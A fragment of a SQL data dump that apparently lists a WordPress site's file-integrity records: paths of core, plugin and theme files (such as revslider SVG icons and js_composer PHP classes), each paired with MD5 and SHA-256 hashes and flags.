(0x3b0b7f0a0b29514210e2ec2d78f0b2a5, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_mode_edit_24px.svg', 0, 0x39d530354818d7f8715ef914c2801afc, 0x39d530354818d7f8715ef914c2801afc, 0x8cf4107675023ba6e59bff1bd903e9d7814f3c4ba652ca60d6bdc9d3af9b247e, '', 0, '?'),
(0x3b0bde1362ad66c89630ff96a6ad7805, 'wp-admin/css/colors/midnight/colors.css', 1, 0x00000000000000000000000000000000, 0x4cb56002de1209c98e9ba405858cbbb4, 0xd83aeb654f4607824d3c6ff605e18fe47aac89f045c79e1b5aa145fc42baa628, '', 0, '?'),
(0x3b11dc92736346c2fcf521e10f9ca9ba, 'wp-includes/css/dist/components/style-rtl.css', 1, 0x00000000000000000000000000000000, 0x0edc3e519c5043a2cb9019ea92dcfdfb, 0x10ad1aa5273da8e582562b3271097b0926cc795249cd92400168c1b244f4301a, '', 0, '?'),
(0x3b24da2db129d442c23b624be63be5ee, 'wp-content/plugins/js_composer/include/templates/params/loop/templates.html', 0, 0xaefb7d65e707d67486702fb5f547eeea, 0xaefb7d65e707d67486702fb5f547eeea, 0xc480771916fe83888d93dab182cc0c423468c0de5aa95adc8b78ea266f1bd480, '', 0, '?'),
(0x3b31d18b2312c1595f4e0f1c84a574f7, 'wp-settings.php', 1, 0x00000000000000000000000000000000, 0xe7eaa3f8c9b764e394bb36cc1bac2b86, 0x4a34ebeddbe76b5bab5893381c511a4cd03e9dcb0f23996200af989aa142150f, '', 0, '?'),
(0x3b31e4a789723249f7a3d4f7adeba60e, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_subway_24px.svg', 0, 0x902585dd611d908da45fdf713ff13db1, 0x902585dd611d908da45fdf713ff13db1, 0xe9bab894dd484cfbc1cbf9ba4be72abafdbc9e731e9c2b33790d6ac2860cb635, '', 0, '?'),
(0x3b332e8e11b6a2c06b7c4d3743a810f2, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-doughnut-chart.svg', 0, 0xf50d5795aa03cbc6306b4f95b166e12c, 0xf50d5795aa03cbc6306b4f95b166e12c, 0xf0469c80d9a93dc71695c7bac648bd3c50fac8c0d1c84f93dd0d009f038e3c84, '', 0, '?'),
(0x3b52de79689beb9fd052784b8d111c0d, 'wp-admin/js/farbtastic.js', 1, 0x00000000000000000000000000000000, 0xa73af354a03241715d8698feea340b92, 0xc96274e9478170ae0042074d16307ac2584a769c5a9d481b0b4174e24d05b825, '', 0, '?'),
(0x3b5e49aea73cd5a8bf154a9528c080c1, 'wp-content/plugins/js_composer/assets/js/vendors/qtranslatex_backend.js', 0, 0x7f80381c1a8ce3e881778720385e8251, 0x7f80381c1a8ce3e881778720385e8251, 0x82f12657bb53cacd2b85cc077c61c4f9d96eced423613f783357fa823576dd05, '', 0, '?'),
(0x3b5ff22bb475e077294a4ffcccb83bf7, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/plugin-installer/index.php', 0, 0x711e2b8969875a603e5ef318de90d838, 0x711e2b8969875a603e5ef318de90d838, 0x0a9223d43dd9c8da8da7407eb6802c3d410767c8f6031b558b6bbcb42a2cb035, '', 0, '?'),
(0x3b626a617c1bd740d54de820b6a52860, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_indeterminate_check_box_24px.svg', 0, 0x1e4f719d25e6d879451cb098ba496663, 0x1e4f719d25e6d879451cb098ba496663, 0x2ff9c46de6ceaec4701310065526d6ba01c1c203d77e9671e38571ec82f7cc57, '', 0, '?'),
(0x3b6fd8bc656e8ab3fc9e635579e54540, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_manual_record_24px.svg', 0, 0x8f4bada6f0e87b14f2f6711ce6f584b4, 0x8f4bada6f0e87b14f2f6711ce6f584b4, 0x425f7607e15c4ccd3a582f70d99ec66789e68cb2472eb3609774e2fe10094166, '', 0, '?'),
(0x3b7615b403e0ddfdeb306310c613a4e3, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-links.php', 0, 0x7bdb3903f4bba85fcfeccfa1f60d4100, 0x7bdb3903f4bba85fcfeccfa1f60d4100, 0x3c9b9c6772861e9a08c89cb77d158d440292d09d9559e775de944ddbb2564e12, '', 0, '?'),
(0x3b8005329b717c66b9139b4ac974a56d, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-custom-fields.svg', 0, 0x1005de67b68379120d0595c6fe8ade62, 0x1005de67b68379120d0595c6fe8ade62, 0x143199297a476d9552d66e9ac51fdc90cbb9290599bcb0e2339f970ac97ee8b4, '', 0, '?'),
(0x3b96ba39398a417784f6ecff61998df6, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_add_shopping_cart_24px.svg', 0, 0xb6b7443989b0568a8bd709a82c526bbf, 0xb6b7443989b0568a8bd709a82c526bbf, 0x30ddc4b612f972078dae0f821078a99fa309165d78d67b64451b286f32a0af64, '', 0, '?'),
(0x3ba83214b001c45db0a8b4a07dc5bdee, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_airplanemode_active_24px.svg', 0, 0x41db81a71bf8266c6f887c118c5b459f, 0x41db81a71bf8266c6f887c118c5b459f, 0x5027ecb46fe7cf6f97874c17e09743d8c87ebe6fa276509261ac647dd97e1b0c, '', 0, '?'),
(0x3bb5fe03b0f46c10cd3f5be67772f7ff, 'wp-content/plugins/js_composer/config/content/shortcode-vc-flickr.php', 0, 0x00afa73694044af37438a3e84989b3c3, 0x00afa73694044af37438a3e84989b3c3, 0x0400760abef237b033cdd1beaab943c48e385398f2ee5d2bc5a909801f3357dd, '', 0, '?'),
(0x3bc536dea06e0006d90ab5881c226a7e, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_free_24px.svg', 0, 0x3db977b14b1b008cdbd00f3c58ade427, 0x3db977b14b1b008cdbd00f3c58ade427, 0xacd39190e9148082d3820b33e0cd645a1dc249f08595972c58613addc6f4ffc7, '', 0, '?'),
(0x3bd71d76f030424baca4b5c4310fd0b4, 'wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php', 1, 0x00000000000000000000000000000000, 0x1dae1d2b036f7e98a458fce5dd9300cd, 0x785818047fb781d1b9da2436dc55645a24fc90d6e67897c1a4dfd826330ed70f, '', 0, '?'),
(0x3be04f6e4eb59a5561db14a2a2b9e944, 'wp-content/themes/Impreza/functions/migrations/us_migration_2_3.php', 0, 0xfe59aa03c4aa812b6fddb1b4fdbaed79, 0xfe59aa03c4aa812b6fddb1b4fdbaed79, 0x3a4445cca1c4a8fe9594637d9b4bba4a9580d22e36b6233dfcad6f572c8ae1ce, '', 0, '?'),
(0x3be406d5723b6c4ba072c88646d30b9b, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-line-chart.php', 0, 0xa31ec23c2830d8e7fefe5067e2adce2e, 0xa31ec23c2830d8e7fefe5067e2adce2e, 0xc75aa7a2f7a2e121cff3219a8a6ac82b368b6ebc9864bedccad1472cfdf481b5, '', 0, '?'),
(0x3be43abfca246d3ea494fe96f37234bd, 'wp-content/plugins/js_composer/include/params/column_offset/column_offset.php', 0, 0x56ec2929b99f77f0d82b38ccbe751977, 0x56ec2929b99f77f0d82b38ccbe751977, 0x98569c04fc37f0e6f731b027a60ee4603a2841f99eadb6a7d5e5bde3bc8369f0, '', 0, '?'),
(0x3bf1576374d4d3e72a2bf7ac427216ca, 'wp-includes/images/smilies/icon_surprised.gif', 1, 0x00000000000000000000000000000000, 0x55ec8bde2deeeb232bfef6b6b530e73f, 0x8e9563757997588ad893df41ace86489355b3d773e99152a5388707765f72e5f, '', 0, '?'),
(0x3bfc1dedd9e2012a0b311a6ebdc334d3, 'wp-includes/js/wp-emoji-loader.min.js', 1, 0x00000000000000000000000000000000, 0x7000dea726f734ed07227e6f1abebb13, 0x3b047264c29dc41743f2e49d8abfa98bf433f61a75789def509d206985e6b347, '', 0, '?'),
(0x3bfe828676750e254b6c699bf38d20ee, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/tab.min.js', 0, 0xf1c9ae683cc831c984b6ccc597641aae, 0xf1c9ae683cc831c984b6ccc597641aae, 0xf168aef0631284e100f262add52032725fd1168baa14002a279164febe78284d, '', 0, '?'),
(0x3c308d436f5ac7fbffff6574652a88bd, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-progress-bar.php', 0, 0x5b5550ff65a4cefe372f3871992aed99, 0x5b5550ff65a4cefe372f3871992aed99, 0x64837a90dc565b686a6d007da4f221c631190f26c9df3e0a99670c6317549232, '', 0, '?'),
(0x3c31842b582cae8788fbe0eaf25509e8, 'wp-content/plugins/revslider/admin/assets/js/codemirror/xml.js', 0, 0x4304a1cbddb1f976e42893f59de690a1, 0x4304a1cbddb1f976e42893f59de690a1, 0xb4076033b1ed1318a0ecb2b80c6617e0c0d535234470a7ec18cc86f0b00e09d0, '', 0, '?'),
(0x3c3e785002bcf5e2fea5bfacefc246f6, 'wp-content/plugins/js_composer/include/params/css_editor/css_editor.php', 0, 0x2867526421f5156b6f02ff4d1fd683d4, 0x2867526421f5156b6f02ff4d1fd683d4, 0xf0afd301e71a8fbf79b900cfddc75a00091ea61ab199073ba94631d86074290b, '', 0, '?'),
(0x3c46e90febef507acc193232a387127e, 'wp-includes/js/imgareaselect/imgareaselect.css', 1, 0x00000000000000000000000000000000, 0x7d28cad92829b3d633a087b5f3b595af, 0x9e71f321ddbf4ad38797f6690a19c1451ee1ad3573e5219d0d901d9785258381, '', 0, '?'),
(0x3c8f8939fe75fe6ab3aeff8421c1240f, 'wp-admin/css/install.css', 1, 0x00000000000000000000000000000000, 0x013f2df17e4c93e1b8ad6b3fe66d2a91, 0x7e0419911d78b23f03e6eef3944cfcd4577b90986e68643f56a30d2314646a25, '', 0, '?'),
(0x3c9702a9d21c9d48ff163a53aa8dd835, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/book-apple.svg', 0, 0x4fd555fa389a698496f9d4a5b8246537, 0x4fd555fa389a698496f9d4a5b8246537, 0x62d77d2496ffc596624aecda31d08b22247b2576c275f10a3bc30cf875d551ad, '', 0, '?'),
(0x3c9c3e8cedf79076f24125f9cb466eb5, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_cached_24px.svg', 0, 0x69fee9cc422ecfd3d54cbf5e392ecbdc, 0x69fee9cc422ecfd3d54cbf5e392ecbdc, 0x9a6c65263e07ca17670f606d96a42e58399c54c62ca581611f81099fd42dc46f, '', 0, '?'),
(0x3ca5d5692fe3f62b1b00ee5be7473592, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_event_available_24px.svg', 0, 0x414ec8ad5f30d4adc9ea181a44e1cca2, 0x414ec8ad5f30d4adc9ea181a44e1cca2, 0x06abf929d94632dd10257a2730033a963216a3f775ce24100e0dc531ff4587c1, '', 0, '?'),
(0x3cb1d72aa13125c947c9abebd9563929, 'wp-content/plugins/revslider/public/assets/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x3cbaf86b9ed00a07c77257d6eba5f842, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_message_24px.svg', 0, 0x2ead965b6dbe33ac259c94a066941fc2, 0x2ead965b6dbe33ac259c94a066941fc2, 0x2f6693d71e5507a301e435031e87868b9cec0638897eeaa2974ca4f9ac07735e, '', 0, '?'),
(0x3cbe1056c9a7472be1d50bcdfb2a94c2, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tune_24px.svg', 0, 0xd36c5d130a8d25e78ca06db05767062e, 0xd36c5d130a8d25e78ca06db05767062e, 0xd11855f8f29a7bd39aea44138ce9f2189da12932e605628a01dd2dc03acf9cf2, '', 0, '?'),
(0x3ce2f2b35db698069ef04d8d56559ed4, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_star_half_24px.svg', 0, 0x620f8420f3decf7e99e23fed855ae159, 0x620f8420f3decf7e99e23fed855ae159, 0x1abbfe9350b801389e8f93c49112436479f17eb4bda528ea057bf032e5179251, '', 0, '?'),
(0x3ce6686ad8098e34bdbb983461d032f6, 'wp-includes/js/utils.js', 1, 0x00000000000000000000000000000000, 0x3328e64dc78c8f83b8a976dd416b1269, 0xb1bbc170f0f769d024f35412bc17268459eccd2d76661706321cd62ab1357766, '', 0, '?'),
(0x3cefce75eabf961adc9cb5c70b59d45e, 'wp-includes/js/tinymce/plugins/wpeditimage/plugin.js', 1, 0x00000000000000000000000000000000, 0x39d6da8be0e91e0150c0684f8b9b7274, 0xf7517685a0b6abf4339ff6a8887af4e0cb675b7e41cc00ec4250701d42415b9c, '', 0, '?'),
(0x3cf3c23f51930dca3ef907e33c528b72, 'wp-content/plugins/wordfence/js/wfdropdown.1579191227.js', 1, 0x00000000000000000000000000000000, 0x8016bdd1e1d872700bf4eef763271abe, 0xe2e09f5347839673383bae5aa221b2d7964ae18475c631b77a180e3fabbf8418, '', 0, '?'),
(0x3d034a10aca6c7b06a618c7d4c49895a, 'wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php', 1, 0x00000000000000000000000000000000, 0xb103c07046f5f181067431c62bf6c0bb, 0x0ffe3b89067ddbfcc7005bb79ebe270d71ce16c4e1dadcc4a564dd3b23e6b02e, '', 0, '?'),
(0x3d09a74140af271f5b5e9ef53a7fdc2f, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_current_portrait_24px.svg', 0, 0x3053dcbcd8fee1f2425f363f217a1f45, 0x3053dcbcd8fee1f2425f363f217a1f45, 0x9cc33361a76aaf62020037482b2636eea3aecd3b284637a1a8de8dc1db13bb24, '', 0, '?'),
(0x3d16594f05e19364067c78d74eff0430, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_9_1.php', 0, 0x9f8980d43088a72c7c16ba46ac748074, 0x9f8980d43088a72c7c16ba46ac748074, 0xc843b8be314f5ada9277256fda692f00aca5a10deb528afc07cc87b9bd166000, '', 0, '?'),
(0x3d1bbfb2dc663b56f364056c220ea7c0, 'wp-admin/css/code-editor-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xec293f73d213bb45f413489b1be4ddd1, 0x12d3cc13798eb99171d0f17d6c7ff510e95bd53da6e0b309f06e289d634c8b43, '', 0, '?'),
(0x3d1d095dfee9ff927dfadc2a3c11012e, 'wp-content/plugins/wordfence/views/waf/waf-install-manual.php', 1, 0x00000000000000000000000000000000, 0x24f278fdb01c7e291591ab875bda9c7a, 0x37e35220acef4ec460136e5e9a3fa68f2807bdda29a18008cf5e5284ce9ac496, '', 0, '?'),
(0x3d539636c86114b09f03586fb02c9432, 'wp-content/plugins/wordfence/vendor/autoload.php', 1, 0x00000000000000000000000000000000, 0x1f6e9f5638b75ca17fe4cb4214061373, 0x37eefa68c2dc0b8186d3fc3e3862ba0775745e5ea75278aa3236c9236928fa11, '', 0, '?'),
(0x3d66e975f1a5413e3c54116896c9cf40, 'wp-includes/js/jquery/ui/progressbar.min.js', 1, 0x00000000000000000000000000000000, 0x34c78c33e7c97e65a369bb0137d93d05, 0x466436326c28d241e0a4e7892f86da5b3dea6f892e2a957e6ff381b0d00bb5e6, '', 0, '?'),
(0x3d7577312465ab5a3684eafd5e2c1084, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_hd_24px.svg', 0, 0x802d04c8d6efb0cb2de8e388d4c09b6f, 0x802d04c8d6efb0cb2de8e388d4c09b6f, 0x988f8ae22242853148354c6ab78ca185e934dec88d226f6ecf78574788155ce3, '', 0, '?'),
(0x3d88d1d20715697e493102bbe184166c, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flip_to_back_24px.svg', 0, 0x2339a42151a1a44440b5c0e43f7ff762, 0x2339a42151a1a44440b5c0e43f7ff762, 0x5c6aa6768a8ec1fdf519dd98a5a409356429e8b8de6192505dd8a7e92dda22e5, '', 0, '?'),
(0x3db08a6b98155b349c93a220bc903dce, 'wp-includes/comment-template.php', 1, 0x00000000000000000000000000000000, 0x99954172a5ccde98e6ed7a8d3ca6bf0f, 0xef409b6c382158a00b86e56709df4a37d0b235330f837d51ec273ff974e12fec, '', 0, '?'),
(0x3de346d3ed98a3b7c386b1c24b26058a, 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php', 1, 0x00000000000000000000000000000000, 0xc639ae3a37f69b855d366856116ff6e2, 0xdfab1cb39a2f4c6be219b4f1c74f54e26264530bcd45694c39ec06eacd7e1438, '', 0, '?'),
(0x3de6965cfee5878f4d5ef99bcbd7424f, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_nature_24px.svg', 0, 0xf632b75f49cade5c4bd311c1567ca60c, 0xf632b75f49cade5c4bd311c1567ca60c, 0xc14b77d8df558feed58cdea69ede593477de00099f0d80d04aa691bd01f79579, '', 0, '?'),
(0x3e13e3698825d2f899f0cb55d92c454c, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/coffee.svg', 0, 0x09375814aa7fdd85a3c105fadad88b89, 0x09375814aa7fdd85a3c105fadad88b89, 0xf76496edf97225f43b5dbae517e6238621937e6f2d836d6f72208a8a1aff9c7d, '', 0, '?'),
(0x3e1f061468004ab5004cf7d16f572ad0, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-fonts.svg', 0, 0x7c79faad8f980934ea74d940404f0a67, 0x7c79faad8f980934ea74d940404f0a67, 0x47c239fc9ee77062dbb1fab299ea9c51082f375d08a67281801f770c3365a604, '', 0, '?'),
(0x3e358fcdcb8f2e7932515bdaa3e33183, 'wp-includes/blocks/block.php', 1, 0x00000000000000000000000000000000, 0xe337c377e9fbd5a5a0b46d8a60e30a77, 0x2c2c0f7d1027b3ffaa5c4f056e43fb470e967cb90937cc1f7fa2de9bc9edf543, '', 0, '?'),
(0x3e3aa9e285e355d73da1d76cfaae170d, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_announcement_24px.svg', 0, 0x5e5e082aa09067cb18b1f26a14d4018e, 0x5e5e082aa09067cb18b1f26a14d4018e, 0xa821c5896717d602df1a25f90d4fdc197e55e94df04290aa15b32aaf7df2a56e, '', 0, '?'),
(0x3e47c77fad4fe46a50d56ca88dee4208, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php', 1, 0x00000000000000000000000000000000, 0xfedc249b5d5cb3e2a2e7d2c6c71ed20b, 0xd89a7822836f8c2a49e70a519bd26ab8b71b838ae75428f3471aac2e10a21a07, '', 0, '?'),
(0x3e68d0a9ec58140c582aff763195a9b9, 'wp-includes/theme-compat/comments.php', 1, 0x00000000000000000000000000000000, 0xe0dc27349a465228e9d3b97b5729eea3, 0x17940ae9cab27287047c74241ff4682daa86bc0b4145835389532c765886ea59, '', 0, '?'),
(0x3e716cee2baa6d14c80035c4a622865e, 'wp-includes/js/customize-preview.min.js', 1, 0x00000000000000000000000000000000, 0x7a6543b3b6d26ec558fac675836a565b, 0xad7981240d4f8b3b315671590a1d078c85d07fdd34637508da1d9884a05edf4f, '', 0, '?'),
(0x3e75b8eb99cab8852106344e32dac312, 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff', 1, 0x00000000000000000000000000000000, 0xdb2cca3b4c8a27b31607b4646565b49f, 0xb619142b47fb547d15e46d292addcc5b92b5d3631f35bd5add4e2d7611193eb4, '', 0, '?'),
(0x3e7f58cf20dd33a4fc67e3cd2faa423d, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/abacus.svg', 0, 0x6916c1d46671733ebf1caee9c64aa630, 0x6916c1d46671733ebf1caee9c64aa630, 0x0a4a68747286b35b6b870c9afb2a57a4a401f1ec708f05610c10234fbc5b767b, '', 0, '?'),
(0x3e80d578db92d4e9a209b211ae09349e, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_fingerprint_24px.svg', 0, 0xd169e57661f861225b1f172a256632b7, 0xd169e57661f861225b1f172a256632b7, 0x2c392cb3e910396ffd6f4e9a53aaf47d06ab71477860b6c9203163daf98e2663, '', 0, '?'),
(0x3e94f1b7d93d9f8f0c82197065a233a0, 'wp-content/themes/Impreza/framework/vendor/usof/js/ace/mode-html.js', 0, 0xfd17f5410ec10af0af020c1101a9b567, 0xfd17f5410ec10af0af020c1101a9b567, 0x4cda7d005712b319156e63552f65ab13c4cd1d371666116f797fda538f7f6078, '', 0, '?'),
(0x3e976451132822805b394c4e088a722a, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_unarchive_24px.svg', 0, 0x95fb239d137b9b69a04b758089556fee, 0x95fb239d137b9b69a04b758089556fee, 0x8040ff51a1e21e6712c5442a6238a9a510b1e05b252bf1a120440b89f0316058, '', 0, '?'),
(0x3e9a3bb41798700668f39c2eb674240d, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_people_24px.svg', 0, 0xe64c84eb627368e50fe68547896eb720, 0xe64c84eb627368e50fe68547896eb720, 0x5065855bc9fd0c46fc82b8799aa611c5c69f131215df1cdd3656f60b5177575e, '', 0, '?'),
(0x3e9adc44190e72c165bcac8f6630a363, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/champagne.svg', 0, 0xd9674ea8dccfa1aae19df5e51ec5dd28, 0xd9674ea8dccfa1aae19df5e51ec5dd28, 0x9867c1bea0b782b6e12acd622e38fc42c2a25bd5bba876c508609829a4b86566, '', 0, '?'),
(0x3ea9c658b90d06fd62f5dfda9fae2457, 'wp-includes/class-wp-image-editor-gd.php', 1, 0x00000000000000000000000000000000, 0xb80db5a0584d861b4c33388f53820fcc, 0x057232e6211d0c732e76301f2638651e29704f9e40ea9c0f40f57102294e2065, '', 0, '?'),
(0x3ea9fcacc69cc45c590fcea250ecbd6d, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grid_on_24px.svg', 0, 0x747c6e109090c13e81be2b549dab944e, 0x747c6e109090c13e81be2b549dab944e, 0x7f5ca54b41812ff288e03f4e63228533162031303e39b91e0079eda7295b154d, '', 0, '?'),
(0x3eefcca804156b12a5a46f5c0636d3ab, 'wp-content/plugins/js_composer/include/classes/core/class-vc-base.php', 0, 0x7986958447db29e9c40bdccaad08c51e, 0x7986958447db29e9c40bdccaad08c51e, 0xf56a5235ff01b95a07783290c1430764e1de487f5113321c60cc8b47f6c593eb, '', 0, '?'),
(0x3f267938a91f6f06fb44df7e50375b49, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_switch_video_24px.svg', 0, 0x12400cdb72645c087945b94946680085, 0x12400cdb72645c087945b94946680085, 0x19e9bbce859520c172e699fbe9bf20b0055c2faa39cb195169786e758326d0ec, '', 0, '?'),
(0x3f32795421737cc0a874b0e688f7757d, 'wp-includes/random_compat/random_bytes_dev_urandom.php', 1, 0x00000000000000000000000000000000, 0x9716ae64cafdefaf05e8d8ed1a4872db, 0x0a4466647650ff668e4f106e3a9e9398aa6186e5d0b3c2918a84bb58dd0c0b1c, '', 0, '?'),
(0x3f365ee7594e8109614103b0c50bfb05, 'wp-content/plugins/wordfence/css/dt_table.1579191227.css', 1, 0x00000000000000000000000000000000, 0x06e5674a626a9c4ac18e39b96b3a03de, 0x6f5b501cc24879d08a7dbde5ec7f694763ac7e94d03c63a51f447fec523a44ed, '', 0, '?'),
(0x3f3f51240ea550a3acc02e3a01583610, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php', 1, 0x00000000000000000000000000000000, 0x06f7cb7c7fb94b85feefba2dc409b7c6, 0x335c334c0d3fe81e4238c058151af2b302ab4e893877d0e843fb80164e553d4d, '', 0, '?'),
(0x3f559eb5f603bdbc9a275f6c2e850f70, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php', 1, 0x00000000000000000000000000000000, 0x6f3e42f79809bf9fbd9113494e942d79, 0x0efee5686c8e085bc0bbb6bd86a712f1ab28bf016c7e9151f775df464db20993, '', 0, '?'),
(0x3f55c9a0940651e72de2d599e3bca34d, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sr_RS.po', 1, 0x00000000000000000000000000000000, 0x4cf87dbf7826905f785da56ab5b72714, 0x954d40619166bc15da5ba2a2e1ebfb32f6a779bcf49fed47c7b95806ce2a47fb, '', 0, '?'),
(0x3f59768e71015fea7f97ffb3dbae584f, 'wp-content/plugins/wordfence/images/sort_both.gif', 1, 0x00000000000000000000000000000000, 0xc5e1250cd942ac511678c153562e1044, 0x92a884f936c6c21322407f58db67271fe65737ffb077f4cb674a99901cdf7110, '', 0, '?'),
(0x3f5dfd50fb2e0ea39831ffb483cc3262, 'wp-includes/js/tinymce/plugins/textcolor/plugin.js', 1, 0x00000000000000000000000000000000, 0x02dc2569a033c9e1d6c966e4e8fbdade, 0x28de01be45154cd9fba007d51c94625b998a4bda2173acd38ad46ec4b21ba3c2, '', 0, '?'),
(0x3fabf03db24004ed4d8e24238e8d5037, 'wp-includes/js/dist/html-entities.min.js', 1, 0x00000000000000000000000000000000, 0x926549c2345d841c4e9aa846b47faf66, 0x50d554fc3ec612211ba6ffd95bf27a35a8afdbe28fe8ae4b416e5c5c1ac6df9b, '', 0, '?'),
(0x3fb75babe082984a1062f5db60482af8, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/css/fonts/slick.svg', 0, 0x2049ab7df3a1595fe57f4974333980a8, 0x2049ab7df3a1595fe57f4974333980a8, 0x188f84cdb84872a797ff4d8b0389146fda539cd2d1741383448e53a201a8d0cc, '', 0, '?'),
(0x3fb9c792f4a69e630fdcac2a39e3d71c, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-search.php', 0, 0xe0fbcf5a4a145f0b9e675cf136d775f3, 0xe0fbcf5a4a145f0b9e675cf136d775f3, 0xe7a2260fa7a1c2bbcdbfab701df2d6cfd6022088f89db9b594715eef4173d113, '', 0, '?'),
(0x3fd482afa8fb8f8bfc3f6f7df596a70f, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/featured_image.php', 0, 0x59f078077eb3d1fd383000a15768ed95, 0x59f078077eb3d1fd383000a15768ed95, 0x6bd932d1608585ec6e7203158b2d2ddc33ad4c3dc2e045acc172afeddf15f197, '', 0, '?'),
(0x3fd8ca239f6925a922c9e97c9aca892b, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_open_in_new_24px.svg', 0, 0xf9202f14af450270916e7b972de89521, 0xf9202f14af450270916e7b972de89521, 0x483b00eb03f41a0163b3b38f5eb8172a27849025d872c1b2a4ad4ed6123dbfd2, '', 0, '?'),
(0x3ff2e5adc4a15a5e8fa802a1b6400fa2, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/message.php', 0, 0xc60d18e7d2912b03672992bafdee727b, 0xc60d18e7d2912b03672992bafdee727b, 0xe713e66fd51dbaa1a3917fdbb37d9e36c1dc18f628609437d0e007355d813ad9, '', 0, '?'),
(0x3ff3a9a7b93add7a4b657149bbfd83d4, 'wp-content/plugins/js_composer/include/classes/core/shared-templates/class-vc-shared-templates.php', 0, 0x20778f8f531d8d0277302a4be3dd4bf9, 0x20778f8f531d8d0277302a4be3dd4bf9, 0xd12c21d6aeb071d7c521b06bb4abe9a21ed6fb54e789489d720b79b05f5f423f, '', 0, '?'),
(0x3ffbb16f139b42e03937b993550871a7, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/closed-sign.svg', 0, 0x33c0a20bea33038de516a48ceb5d8974, 0x33c0a20bea33038de516a48ceb5d8974, 0xea38ba64b28058d6501a2d5d2eb9f7dfd265d90bdf0a47b9d08fe5a34cea2108, '', 0, '?'),
(0x3ffe406eefdbb4826eb11ab9885789d6, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar4.svg', 0, 0x1540a1a0a45fb083a1f3134cc346e56f, 0x1540a1a0a45fb083a1f3134cc346e56f, 0x43847042c914e7ec257e859d6d599c5f4e50ea3101a3ab8ba27af292a7f24aa5, '', 0, '?'),
(0x400df02d673bff0e8cb86ccf58016ff3, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_font_manager.php', 0, 0x5749eda0f6031abada28c46e37c390cc, 0x5749eda0f6031abada28c46e37c390cc, 0x6f7b67fb76bca50d7461733065e76ae343fcb87219d448e624db5c57a58bd6ca, '', 0, '?'),
(0x40139698e373d83acf10f9f41127c8d9, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_person.php', 0, 0x74d8ac6bbda17960eb4790601eee3049, 0x74d8ac6bbda17960eb4790601eee3049, 0x6bf4f3eb25b38e081739b5d667e4cf31aeeb2f70d3b13a657c5470689566b27a, '', 0, '?'),
(0x4056f324f54bc6e7f23cde312ae0acc0, 'wp-includes/css/jquery-ui-dialog.min.css', 1, 0x00000000000000000000000000000000, 0x1ee52c1421996228205da31d46d967c3, 0xa5b6189d6204264ef93f3b12b23badb83f221bfd798c09dcb97518b649185cc3, '', 0, '?'),
(0x406b2fa0c1a107058ce649893f542c12, 'wp-includes/js/jquery/ui/datepicker.min.js', 1, 0x00000000000000000000000000000000, 0x70b4930dc8e018f851f8530c330b1456, 0x038a42336585143367a9ca2befec3d222281f767534f6626fc42ffafdec4b406, '', 0, '?'),
(0x406d60d0eccce6147358ffb70b960ce4, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-posts-slider-2.svg', 0, 0x3ea8355eddc7fde8206e9e3710ee9963, 0x3ea8355eddc7fde8206e9e3710ee9963, 0x75dfb648c10a7cf278c01502e4d6c249dad1278ecb08f3421f68a1feb91ef268, '', 0, '?'),
